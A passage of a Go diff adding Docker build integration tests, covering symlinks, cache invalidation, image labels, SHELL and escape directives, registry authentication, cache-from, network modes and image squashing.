+	out, _ = dockerCmd(c, "run", "--rm", id, "cat", "target")
+	c.Assert(out, checker.Matches, "baz")
+}
+
+func (s *DockerSuite) TestBuildFollowSymlinkToDir(c *check.C) {
+	name := "testbuildbrokensymlink"
+	ctx, err := fakeContext(`
+	FROM busybox
+	COPY asymlink /`,
+		map[string]string{
+			"foo/abc": "bar",
+			"foo/def": "baz",
+		})
+	c.Assert(err, checker.IsNil)
+	defer ctx.Close()
+
+	err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink"))
+	c.Assert(err, checker.IsNil)
+
+	id, err := buildImageFromContext(name, ctx, true)
+	c.Assert(err, checker.IsNil)
+
+	out, _ := dockerCmd(c, "run", "--rm", id, "cat", "abc", "def")
+	c.Assert(out, checker.Matches, "barbaz")
+
+	// change target file should invalidate cache
+	err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo/def"), []byte("bax"), 0644)
+	c.Assert(err, checker.IsNil)
+
+	id, out, err = buildImageFromContextWithOut(name, ctx, true)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), "Using cache")
+
+	out, _ = dockerCmd(c, "run", "--rm", id, "cat", "abc", "def")
+	c.Assert(out, checker.Matches, "barbax")
+
+}
+
+// TestBuildSymlinkBasename tests that target file gets basename from symlink,
+// not from the target file.
+func (s *DockerSuite) TestBuildSymlinkBasename(c *check.C) {
+	name := "testbuildbrokensymlink"
+	ctx, err := fakeContext(`
+	FROM busybox
+	COPY asymlink /`,
+		map[string]string{
+			"foo": "bar",
+		})
+	c.Assert(err, checker.IsNil)
+	defer ctx.Close()
+
+	err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink"))
+	c.Assert(err, checker.IsNil)
+
+	id, err := buildImageFromContext(name, ctx, true)
+	c.Assert(err, checker.IsNil)
+
+	out, _ := dockerCmd(c, "run", "--rm", id, "cat", "asymlink")
+	c.Assert(out, checker.Matches, "bar")
+
+}
+
+// #17827
+func (s *DockerSuite) TestBuildCacheRootSource(c *check.C) {
+	name := "testbuildrootsource"
+	ctx, err := fakeContext(`
+	FROM busybox
+	COPY / /data`,
+		map[string]string{
+			"foo": "bar",
+		})
+	c.Assert(err, checker.IsNil)
+	defer ctx.Close()
+
+	// warm up cache
+	_, err = buildImageFromContext(name, ctx, true)
+	c.Assert(err, checker.IsNil)
+
+	// change file, should invalidate cache
+	err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("baz"), 0644)
+	c.Assert(err, checker.IsNil)
+
+	_, out, err := buildImageFromContextWithOut(name, ctx, true)
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(out, checker.Not(checker.Contains), "Using cache")
+}
+
+// #19375
+func (s *DockerSuite) TestBuildFailsGitNotCallable(c *check.C) {
+	cmd := exec.Command(dockerBinary, "build", "github.com/docker/v1.10-migrator.git")
+	cmd.Env = append(cmd.Env, "PATH=")
+	out, _, err := runCommandWithOutput(cmd)
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "unable to prepare context: unable to find 'git': ")
+
+	cmd = exec.Command(dockerBinary, "build", "https://github.com/docker/v1.10-migrator.git")
+	cmd.Env = append(cmd.Env, "PATH=")
+	out, _, err = runCommandWithOutput(cmd)
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "unable to prepare context: unable to find 'git': ")
+}
+
+// TestBuildWorkdirWindowsPath tests that a Windows style path works as a workdir
+func (s *DockerSuite) TestBuildWorkdirWindowsPath(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	name := "testbuildworkdirwindowspath"
+
+	_, err := buildImage(name, `
+	FROM `+WindowsBaseImage+`
+	RUN mkdir C:\\work
+	WORKDIR C:\\work
+	RUN if "%CD%" NEQ "C:\work" exit -1
+	`, true)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildLabel(c *check.C) {
+	name := "testbuildlabel"
+	testLabel := "foo"
+
+	_, err := buildImage(name, `
+  FROM `+minimalBaseImage()+`
+  LABEL default foo
+`, false, "--label", testLabel)
+
+	c.Assert(err, checker.IsNil)
+
+	res := inspectFieldJSON(c, name, "Config.Labels")
+
+	var labels map[string]string
+
+	if err := json.Unmarshal([]byte(res), &labels); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, ok := labels[testLabel]; !ok {
+		c.Fatal("label not found in image")
+	}
+}
+
+func (s *DockerSuite) TestBuildLabelOneNode(c *check.C) {
+	name := "testbuildlabel"
+
+	_, err := buildImage(name, "FROM busybox", false, "--label", "foo=bar")
+
+	c.Assert(err, checker.IsNil)
+
+	res, err := inspectImage(name, "json .Config.Labels")
+	c.Assert(err, checker.IsNil)
+	var labels map[string]string
+
+	if err := json.Unmarshal([]byte(res), &labels); err != nil {
+		c.Fatal(err)
+	}
+
+	v, ok := labels["foo"]
+	if !ok {
+		c.Fatal("label `foo` not found in image")
+	}
+	c.Assert(v, checker.Equals, "bar")
+}
+
+func (s *DockerSuite) TestBuildLabelCacheCommit(c *check.C) {
+	name := "testbuildlabelcachecommit"
+	testLabel := "foo"
+
+	if _, err := buildImage(name, `
+  FROM `+minimalBaseImage()+`
+  LABEL default foo
+  `, false); err != nil {
+		c.Fatal(err)
+	}
+
+	_, err := buildImage(name, `
+  FROM `+minimalBaseImage()+`
+  LABEL default foo
+`, true, "--label", testLabel)
+
+	c.Assert(err, checker.IsNil)
+
+	res := inspectFieldJSON(c, name, "Config.Labels")
+
+	var labels map[string]string
+
+	if err := json.Unmarshal([]byte(res), &labels); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, ok := labels[testLabel]; !ok {
+		c.Fatal("label not found in image")
+	}
+}
+
+func (s *DockerSuite) TestBuildLabelMultiple(c *check.C) {
+	name := "testbuildlabelmultiple"
+	testLabels := map[string]string{
+		"foo": "bar",
+		"123": "456",
+	}
+
+	labelArgs := []string{}
+
+	for k, v := range testLabels {
+		labelArgs = append(labelArgs, "--label", k+"="+v)
+	}
+
+	_, err := buildImage(name, `
+  FROM `+minimalBaseImage()+`
+  LABEL default foo
+`, false, labelArgs...)
+
+	if err != nil {
+		c.Fatal("error building image with labels", err)
+	}
+
+	res := inspectFieldJSON(c, name, "Config.Labels")
+
+	var labels map[string]string
+
+	if err := json.Unmarshal([]byte(res), &labels); err != nil {
+		c.Fatal(err)
+	}
+
+	for k, v := range testLabels {
+		if x, ok := labels[k]; !ok || x != v {
+			c.Fatalf("label %s=%s not found in image", k, v)
+		}
+	}
+}
+
+func (s *DockerSuite) TestBuildLabelOverwrite(c *check.C) {
+	name := "testbuildlabeloverwrite"
+	testLabel := "foo"
+	testValue := "bar"
+
+	_, err := buildImage(name, `
+  FROM `+minimalBaseImage()+`
+  LABEL `+testLabel+`+ foo
+`, false, []string{"--label", testLabel + "=" + testValue}...)
+
+	if err != nil {
+		c.Fatal("error building image with labels", err)
+	}
+
+	res := inspectFieldJSON(c, name, "Config.Labels")
+
+	var labels map[string]string
+
+	if err := json.Unmarshal([]byte(res), &labels); err != nil {
+		c.Fatal(err)
+	}
+
+	v, ok := labels[testLabel]
+	if !ok {
+		c.Fatal("label not found in image")
+	}
+
+	if v != testValue {
+		c.Fatal("label not overwritten")
+	}
+}
+
+func (s *DockerRegistryAuthHtpasswdSuite) TestBuildFromAuthenticatedRegistry(c *check.C) {
+	dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL)
+
+	baseImage := privateRegistryURL + "/baseimage"
+
+	_, err := buildImage(baseImage, `
+	FROM busybox
+	ENV env1 val1
+	`, true)
+
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "push", baseImage)
+	dockerCmd(c, "rmi", baseImage)
+
+	_, err = buildImage(baseImage, fmt.Sprintf(`
+	FROM %s
+	ENV env2 val2
+	`, baseImage), true)
+
+	c.Assert(err, checker.IsNil)
+}
+
+func (s *DockerRegistryAuthHtpasswdSuite) TestBuildWithExternalAuth(c *check.C) {
+	osPath := os.Getenv("PATH")
+	defer os.Setenv("PATH", osPath)
+
+	workingDir, err := os.Getwd()
+	c.Assert(err, checker.IsNil)
+	absolute, err := filepath.Abs(filepath.Join(workingDir, "fixtures", "auth"))
+	c.Assert(err, checker.IsNil)
+	testPath := fmt.Sprintf("%s%c%s", osPath, filepath.ListSeparator, absolute)
+
+	os.Setenv("PATH", testPath)
+
+	repoName := fmt.Sprintf("%v/dockercli/busybox:authtest", privateRegistryURL)
+
+	tmp, err := ioutil.TempDir("", "integration-cli-")
+	c.Assert(err, checker.IsNil)
+
+	externalAuthConfig := `{ "credsStore": "shell-test" }`
+
+	configPath := filepath.Join(tmp, "config.json")
+	err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644)
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL)
+
+	b, err := ioutil.ReadFile(configPath)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(b), checker.Not(checker.Contains), "\"auth\":")
+
+	dockerCmd(c, "--config", tmp, "tag", "busybox", repoName)
+	dockerCmd(c, "--config", tmp, "push", repoName)
+
+	// make sure the image is pulled when building
+	dockerCmd(c, "rmi", repoName)
+
+	buildCmd := exec.Command(dockerBinary, "--config", tmp, "build", "-")
+	buildCmd.Stdin = strings.NewReader(fmt.Sprintf("FROM %s", repoName))
+
+	out, _, err := runCommandWithOutput(buildCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+}
+
+// Test cases in #22036
+func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) {
+	// Command line option labels will always override
+	name := "scratchy"
+	expected := `{"bar":"from-flag","foo":"from-flag"}`
+	_, err := buildImage(name,
+		`FROM `+minimalBaseImage()+`
+                LABEL foo=from-dockerfile`,
+		true, "--label", "foo=from-flag", "--label", "bar=from-flag")
+	c.Assert(err, check.IsNil)
+
+	res := inspectFieldJSON(c, name, "Config.Labels")
+	if res != expected {
+		c.Fatalf("Labels %s, expected %s", res, expected)
+	}
+
+	name = "from"
+	expected = `{"foo":"from-dockerfile"}`
+	_, err = buildImage(name,
+		`FROM `+minimalBaseImage()+`
+                LABEL foo from-dockerfile`,
+		true)
+	c.Assert(err, check.IsNil)
+
+	res = inspectFieldJSON(c, name, "Config.Labels")
+	if res != expected {
+		c.Fatalf("Labels %s, expected %s", res, expected)
+	}
+
+	// Command line option label will override even via `FROM`
+	name = "new"
+	expected = `{"bar":"from-dockerfile2","foo":"new"}`
+	_, err = buildImage(name,
+		`FROM from
+                LABEL bar from-dockerfile2`,
+		true, "--label", "foo=new")
+	c.Assert(err, check.IsNil)
+
+	res = inspectFieldJSON(c, name, "Config.Labels")
+	if res != expected {
+		c.Fatalf("Labels %s, expected %s", res, expected)
+	}
+
+	// Command line option without a value set (--label foo, --label bar=)
+	// will be treated as --label foo="", --label bar=""
+	name = "scratchy2"
+	expected = `{"bar":"","foo":""}`
+	_, err = buildImage(name,
+		`FROM `+minimalBaseImage()+`
+                LABEL foo=from-dockerfile`,
+		true, "--label", "foo", "--label", "bar=")
+	c.Assert(err, check.IsNil)
+
+	res = inspectFieldJSON(c, name, "Config.Labels")
+	if res != expected {
+		c.Fatalf("Labels %s, expected %s", res, expected)
+	}
+
+	// Command line option without a value set (--label foo, --label bar=)
+	// will be treated as --label foo="", --label bar=""
+	// This time is for inherited images
+	name = "new2"
+	expected = `{"bar":"","foo":""}`
+	_, err = buildImage(name,
+		`FROM from
+                LABEL bar from-dockerfile2`,
+		true, "--label", "foo=", "--label", "bar")
+	c.Assert(err, check.IsNil)
+
+	res = inspectFieldJSON(c, name, "Config.Labels")
+	if res != expected {
+		c.Fatalf("Labels %s, expected %s", res, expected)
+	}
+
+	// Command line option labels with only `FROM`
+	name = "scratchy"
+	expected = `{"bar":"from-flag","foo":"from-flag"}`
+	_, err = buildImage(name,
+		`FROM `+minimalBaseImage(),
+		true, "--label", "foo=from-flag", "--label", "bar=from-flag")
+	c.Assert(err, check.IsNil)
+
+	res = inspectFieldJSON(c, name, "Config.Labels")
+	if res != expected {
+		c.Fatalf("Labels %s, expected %s", res, expected)
+	}
+
+	// Command line option labels with env var
+	name = "scratchz"
+	expected = `{"bar":"$PATH"}`
+	_, err = buildImage(name,
+		`FROM `+minimalBaseImage(),
+		true, "--label", "bar=$PATH")
+	c.Assert(err, check.IsNil)
+
+	res = inspectFieldJSON(c, name, "Config.Labels")
+	if res != expected {
+		c.Fatalf("Labels %s, expected %s", res, expected)
+	}
+
+}
+
+// Test case for #22855
+func (s *DockerSuite) TestBuildDeleteCommittedFile(c *check.C) {
+	name := "test-delete-committed-file"
+
+	_, err := buildImage(name,
+		`FROM busybox
+		RUN echo test > file
+		RUN test -e file
+		RUN rm file
+		RUN sh -c "! test -e file"`, false)
+	if err != nil {
+		c.Fatal(err)
+	}
+}
+
+// #20083
+func (s *DockerSuite) TestBuildDockerignoreComment(c *check.C) {
+	// TODO Windows: Figure out why this test is flakey on TP5. If you add
+	// something like RUN sleep 5, or even RUN ls /tmp after the ADD line,
+	// it is more reliable, but that's not a good fix.
+	testRequires(c, DaemonIsLinux)
+
+	name := "testbuilddockerignorecleanpaths"
+	dockerfile := `
+        FROM busybox
+        ADD . /tmp/
+        RUN sh -c "(ls -la /tmp/#1)"
+        RUN sh -c "(! ls -la /tmp/#2)"
+        RUN sh -c "(! ls /tmp/foo) && (! ls /tmp/foo2) && (ls /tmp/dir1/foo)"`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"foo":      "foo",
+		"foo2":     "foo2",
+		"dir1/foo": "foo in dir1",
+		"#1":       "# file 1",
+		"#2":       "# file 2",
+		".dockerignore": `# Visual C++ cache files
+# because we have git ;-)
+# The above comment is from #20083
+foo
+#dir1/foo
+foo2
+# The following is considered as comment as # is at the beginning
+#1
+# The following is not considered as comment as # is not at the beginning
+  #2
+`,
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+// Test case for #23221
+func (s *DockerSuite) TestBuildWithUTF8BOM(c *check.C) {
+	name := "test-with-utf8-bom"
+	dockerfile := []byte(`FROM busybox`)
+	bomDockerfile := append([]byte{0xEF, 0xBB, 0xBF}, dockerfile...)
+	ctx, err := fakeContextFromNewTempDir()
+	c.Assert(err, check.IsNil)
+	defer ctx.Close()
+	err = ctx.addFile("Dockerfile", bomDockerfile)
+	c.Assert(err, check.IsNil)
+	_, err = buildImageFromContext(name, ctx, true)
+	c.Assert(err, check.IsNil)
+}
+
+// Test case for UTF-8 BOM in .dockerignore, related to #23221
+func (s *DockerSuite) TestBuildWithUTF8BOMDockerignore(c *check.C) {
+	name := "test-with-utf8-bom-dockerignore"
+	dockerfile := `
+        FROM busybox
+		ADD . /tmp/
+		RUN ls -la /tmp
+		RUN sh -c "! ls /tmp/Dockerfile"
+		RUN ls /tmp/.dockerignore`
+	dockerignore := []byte("./Dockerfile\n")
+	bomDockerignore := append([]byte{0xEF, 0xBB, 0xBF}, dockerignore...)
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"Dockerfile": dockerfile,
+	})
+	c.Assert(err, check.IsNil)
+	defer ctx.Close()
+	err = ctx.addFile(".dockerignore", bomDockerignore)
+	c.Assert(err, check.IsNil)
+	_, err = buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+}
+
+// #22489 Shell test to confirm config gets updated correctly
+func (s *DockerSuite) TestBuildShellUpdatesConfig(c *check.C) {
+	name := "testbuildshellupdatesconfig"
+
+	expected := `["foo","-bar","#(nop) ","SHELL [foo -bar]"]`
+	_, err := buildImage(name,
+		`FROM `+minimalBaseImage()+`
+        SHELL ["foo", "-bar"]`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectFieldJSON(c, name, "ContainerConfig.Cmd")
+	if res != expected {
+		c.Fatalf("%s, expected %s", res, expected)
+	}
+	res = inspectFieldJSON(c, name, "ContainerConfig.Shell")
+	if res != `["foo","-bar"]` {
+		c.Fatalf(`%s, expected ["foo","-bar"]`, res)
+	}
+}
+
+// #22489 Changing the shell multiple times and CMD after.
+func (s *DockerSuite) TestBuildShellMultiple(c *check.C) {
+	name := "testbuildshellmultiple"
+
+	_, out, _, err := buildImageWithStdoutStderr(name,
+		`FROM busybox
+		RUN echo defaultshell
+		SHELL ["echo"]
+		RUN echoshell
+		SHELL ["ls"]
+		RUN -l
+		CMD -l`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	// Must contain 'defaultshell' twice
+	if len(strings.Split(out, "defaultshell")) != 3 {
+		c.Fatalf("defaultshell should have appeared twice in %s", out)
+	}
+
+	// Must contain 'echoshell' twice
+	if len(strings.Split(out, "echoshell")) != 3 {
+		c.Fatalf("echoshell should have appeared twice in %s", out)
+	}
+
+	// Must contain "total " (part of ls -l)
+	if !strings.Contains(out, "total ") {
+		c.Fatalf("%s should have contained 'total '", out)
+	}
+
+	// A container started from the image uses the shell-form CMD.
+	// Last shell is ls. CMD is -l. So should contain 'total '.
+	outrun, _ := dockerCmd(c, "run", "--rm", name)
+	if !strings.Contains(outrun, "total ") {
+		c.Fatalf("Expected started container to run ls -l. %s", outrun)
+	}
+}
+
+// #22489. Changed SHELL with ENTRYPOINT
+func (s *DockerSuite) TestBuildShellEntrypoint(c *check.C) {
+	name := "testbuildshellentrypoint"
+
+	_, err := buildImage(name,
+		`FROM busybox
+		SHELL ["ls"]
+		ENTRYPOINT -l`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	// A container started from the image uses the shell-form ENTRYPOINT.
+	// Shell is ls. ENTRYPOINT is -l. So should contain 'total '.
+	outrun, _ := dockerCmd(c, "run", "--rm", name)
+	if !strings.Contains(outrun, "total ") {
+		c.Fatalf("Expected started container to run ls -l. %s", outrun)
+	}
+}
+
+// #22489 Shell test to confirm shell is inherited in a subsequent build
+func (s *DockerSuite) TestBuildShellInherited(c *check.C) {
+	name1 := "testbuildshellinherited1"
+	_, err := buildImage(name1,
+		`FROM busybox
+        SHELL ["ls"]`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	name2 := "testbuildshellinherited2"
+	_, out, _, err := buildImageWithStdoutStderr(name2,
+		`FROM `+name1+`
+        RUN -l`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	// ls -l has "total " followed by some number in it, ls without -l does not.
+	if !strings.Contains(out, "total ") {
+		c.Fatalf("Should have seen total in 'ls -l'.\n%s", out)
+	}
+}
+
+// #22489 Shell test to confirm non-JSON doesn't work
+func (s *DockerSuite) TestBuildShellNotJSON(c *check.C) {
+	name := "testbuildshellnotjson"
+
+	_, err := buildImage(name,
+		`FROM `+minimalBaseImage()+`
+        sHeLl exec -form`, // Casing explicit to ensure error is upper-cased.
+		true)
+	if err == nil {
+		c.Fatal("Image build should have failed")
+	}
+	if !strings.Contains(err.Error(), "SHELL requires the arguments to be in JSON form") {
+		c.Fatal("Error didn't indicate that arguments must be in JSON form")
+	}
+}
+
+// #22489 Windows shell test to confirm native is powershell if executing a PS command
+// This would error if the default shell were still cmd.
+func (s *DockerSuite) TestBuildShellWindowsPowershell(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	name := "testbuildshellpowershell"
+	_, out, err := buildImageWithOut(name,
+		`FROM `+minimalBaseImage()+`
+        SHELL ["powershell", "-command"]
+		RUN Write-Host John`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if !strings.Contains(out, "\nJohn\n") {
+		c.Fatalf("Line with 'John' not found in output %q", out)
+	}
+}
+
+// Verify that escape is being correctly applied to words when escape directive is not \.
+// Tests WORKDIR, ADD
+func (s *DockerSuite) TestBuildEscapeNotBackslashWordTest(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	name := "testbuildescapenotbackslashwordtesta"
+	_, out, err := buildImageWithOut(name,
+		`# escape= `+"`"+`
+		FROM `+minimalBaseImage()+`
+        WORKDIR c:\windows
+		RUN dir /w`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if !strings.Contains(strings.ToLower(out), "[system32]") {
+		c.Fatalf("Line with '[windows]' not found in output %q", out)
+	}
+
+	name = "testbuildescapenotbackslashwordtestb"
+	_, out, err = buildImageWithOut(name,
+		`# escape= `+"`"+`
+		FROM `+minimalBaseImage()+`
+		SHELL ["powershell.exe"]
+        WORKDIR c:\foo
+		ADD Dockerfile c:\foo\
+		RUN dir Dockerfile`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if !strings.Contains(strings.ToLower(out), "-a----") {
+		c.Fatalf("Line with '-a----' not found in output %q", out)
+	}
+
+}
+
+// #22868. Make sure shell-form CMD is marked as escaped in the config of the image
+func (s *DockerSuite) TestBuildCmdShellArgsEscaped(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	name := "testbuildcmdshellescaped"
+	_, err := buildImage(name, `
+  FROM `+minimalBaseImage()+`
+  CMD "ipconfig"
+  `, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectFieldJSON(c, name, "Config.ArgsEscaped")
+	if res != "true" {
+		c.Fatalf("CMD did not update Config.ArgsEscaped on image: %v", res)
+	}
+	dockerCmd(c, "run", "--name", "inspectme", name)
+	dockerCmd(c, "wait", "inspectme")
+	res = inspectFieldJSON(c, name, "Config.Cmd")
+
+	if res != `["cmd","/S","/C","\"ipconfig\""]` {
+		c.Fatalf("CMD was not escaped Config.Cmd: got %v", res)
+	}
+}
+
+// Test case for #24912.
+func (s *DockerSuite) TestBuildStepsWithProgress(c *check.C) {
+	name := "testbuildstepswithprogress"
+
+	totalRun := 5
+	_, out, err := buildImageWithOut(name, "FROM busybox\n"+strings.Repeat("RUN echo foo\n", totalRun), true)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, fmt.Sprintf("Step 1/%d : FROM busybox", 1+totalRun))
+	for i := 2; i <= 1+totalRun; i++ {
+		c.Assert(out, checker.Contains, fmt.Sprintf("Step %d/%d : RUN echo foo", i, 1+totalRun))
+	}
+}
+
+func (s *DockerSuite) TestBuildWithFailure(c *check.C) {
+	name := "testbuildwithfailure"
+
+	// First test case can only detect `nobody` in runtime so all steps will show up
+	buildCmd := "FROM busybox\nRUN nobody"
+	_, stdout, _, err := buildImageWithStdoutStderr(name, buildCmd, false, "--force-rm", "--rm")
+	c.Assert(err, checker.NotNil)
+	c.Assert(stdout, checker.Contains, "Step 1/2 : FROM busybox")
+	c.Assert(stdout, checker.Contains, "Step 2/2 : RUN nobody")
+
+	// Second test case `FFOM` should have been detected before build runs so no steps
+	buildCmd = "FFOM nobody\nRUN nobody"
+	_, stdout, _, err = buildImageWithStdoutStderr(name, buildCmd, false, "--force-rm", "--rm")
+	c.Assert(err, checker.NotNil)
+	c.Assert(stdout, checker.Not(checker.Contains), "Step 1/2 : FROM busybox")
+	c.Assert(stdout, checker.Not(checker.Contains), "Step 2/2 : RUN nobody")
+}
+
+func (s *DockerSuite) TestBuildCacheFrom(c *check.C) {
+	testRequires(c, DaemonIsLinux) // All tests that do save are skipped in windows
+	dockerfile := `
+		FROM busybox
+		ENV FOO=bar
+		ADD baz /
+		RUN touch bax`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"Dockerfile": dockerfile,
+		"baz":        "baz",
+	})
+	c.Assert(err, checker.IsNil)
+	defer ctx.Close()
+
+	id1, err := buildImageFromContext("build1", ctx, true)
+	c.Assert(err, checker.IsNil)
+
+	// rebuild with cache-from
+	id2, out, err := buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1")
+	c.Assert(err, checker.IsNil)
+	c.Assert(id1, checker.Equals, id2)
+	c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3)
+	dockerCmd(c, "rmi", "build2")
+
+	// no cache match with unknown source
+	id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=nosuchtag")
+	c.Assert(err, checker.IsNil)
+	c.Assert(id1, checker.Not(checker.Equals), id2)
+	c.Assert(strings.Count(out, "Using cache"), checker.Equals, 0)
+	dockerCmd(c, "rmi", "build2")
+
+	// clear parent images
+	tempDir, err := ioutil.TempDir("", "test-build-cache-from-")
+	if err != nil {
+		c.Fatalf("failed to create temporary directory: %s", tempDir)
+	}
+	defer os.RemoveAll(tempDir)
+	tempFile := filepath.Join(tempDir, "img.tar")
+	dockerCmd(c, "save", "-o", tempFile, "build1")
+	dockerCmd(c, "rmi", "build1")
+	dockerCmd(c, "load", "-i", tempFile)
+	parentID, _ := dockerCmd(c, "inspect", "-f", "{{.Parent}}", "build1")
+	c.Assert(strings.TrimSpace(parentID), checker.Equals, "")
+
+	// cache still applies without parents
+	id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1")
+	c.Assert(err, checker.IsNil)
+	c.Assert(id1, checker.Equals, id2)
+	c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3)
+	history1, _ := dockerCmd(c, "history", "-q", "build2")
+
+	// Retry, no new intermediate images
+	id3, out, err := buildImageFromContextWithOut("build3", ctx, true, "--cache-from=build1")
+	c.Assert(err, checker.IsNil)
+	c.Assert(id1, checker.Equals, id3)
+	c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3)
+	history2, _ := dockerCmd(c, "history", "-q", "build3")
+
+	c.Assert(history1, checker.Equals, history2)
+	dockerCmd(c, "rmi", "build2")
+	dockerCmd(c, "rmi", "build3")
+	dockerCmd(c, "rmi", "build1")
+	dockerCmd(c, "load", "-i", tempFile)
+
+	// Modify file, everything up to last command and layers are reused
+	dockerfile = `
+		FROM busybox
+		ENV FOO=bar
+		ADD baz /
+		RUN touch newfile`
+	err = ioutil.WriteFile(filepath.Join(ctx.Dir, "Dockerfile"), []byte(dockerfile), 0644)
+	c.Assert(err, checker.IsNil)
+
+	id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1")
+	c.Assert(err, checker.IsNil)
+	c.Assert(id1, checker.Not(checker.Equals), id2)
+	c.Assert(strings.Count(out, "Using cache"), checker.Equals, 2)
+
+	layers1Str, _ := dockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build1")
+	layers2Str, _ := dockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build2")
+
+	var layers1 []string
+	var layers2 []string
+	c.Assert(json.Unmarshal([]byte(layers1Str), &layers1), checker.IsNil)
+	c.Assert(json.Unmarshal([]byte(layers2Str), &layers2), checker.IsNil)
+
+	c.Assert(len(layers1), checker.Equals, len(layers2))
+	for i := 0; i < len(layers1)-1; i++ {
+		c.Assert(layers1[i], checker.Equals, layers2[i])
+	}
+	c.Assert(layers1[len(layers1)-1], checker.Not(checker.Equals), layers2[len(layers1)-1])
+}
+
+func (s *DockerSuite) TestBuildNetNone(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	name := "testbuildnetnone"
+	_, out, err := buildImageWithOut(name, `
+  FROM busybox
+  RUN ping -c 1 8.8.8.8
+  `, true, "--network=none")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "unreachable")
+}
+
+func (s *DockerSuite) TestBuildNetContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	id, _ := dockerCmd(c, "run", "--hostname", "foobar", "-d", "busybox", "nc", "-ll", "-p", "1234", "-e", "hostname")
+
+	name := "testbuildnetcontainer"
+	out, err := buildImage(name, `
+  FROM busybox
+  RUN nc localhost 1234 > /otherhost
+  `, true, "--network=container:"+strings.TrimSpace(id))
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+
+	host, _ := dockerCmd(c, "run", "testbuildnetcontainer", "cat", "/otherhost")
+	c.Assert(strings.TrimSpace(host), check.Equals, "foobar")
+}
+
+func (s *DockerSuite) TestBuildSquashParent(c *check.C) {
+	testRequires(c, ExperimentalDaemon)
+	dockerFile := `
+		FROM busybox
+		RUN echo hello > /hello
+		RUN echo world >> /hello
+		RUN echo hello > /remove_me
+		ENV HELLO world
+		RUN rm /remove_me
+		`
+	// build and get the ID that we can use later for history comparison
+	origID, err := buildImage("test", dockerFile, false)
+	c.Assert(err, checker.IsNil)
+
+	// build with squash
+	id, err := buildImage("test", dockerFile, true, "--squash")
+	c.Assert(err, checker.IsNil)
+
+	out, _ := dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", "cat /hello")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "hello\nworld")
+
+	dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", "[ ! -f /remove_me ]")
+	dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", `[ "$(echo $HELLO)" == "world" ]`)
+
+	// make sure the ID produced is the ID of the tag we specified
+	inspectID, err := inspectImage("test", ".ID")
+	c.Assert(err, checker.IsNil)
+	c.Assert(inspectID, checker.Equals, id)
+
+	origHistory, _ := dockerCmd(c, "history", origID)
+	testHistory, _ := dockerCmd(c, "history", "test")
+
+	splitOrigHistory := strings.Split(strings.TrimSpace(origHistory), "\n")
+	splitTestHistory := strings.Split(strings.TrimSpace(testHistory), "\n")
+	c.Assert(len(splitTestHistory), checker.Equals, len(splitOrigHistory)+1)
+
+	out, err = inspectImage(id, "len .RootFS.Layers")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "3")
+}
+
+func (s *DockerSuite) TestBuildContChar(c *check.C) {
+	name := "testbuildcontchar"
+
+	_, out, err := buildImageWithOut(name,
+		`FROM busybox\`, true)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "Step 1/1 : FROM busybox")
+
+	_, out, err = buildImageWithOut(name,
+		`FROM busybox
+		 RUN echo hi \`, true)
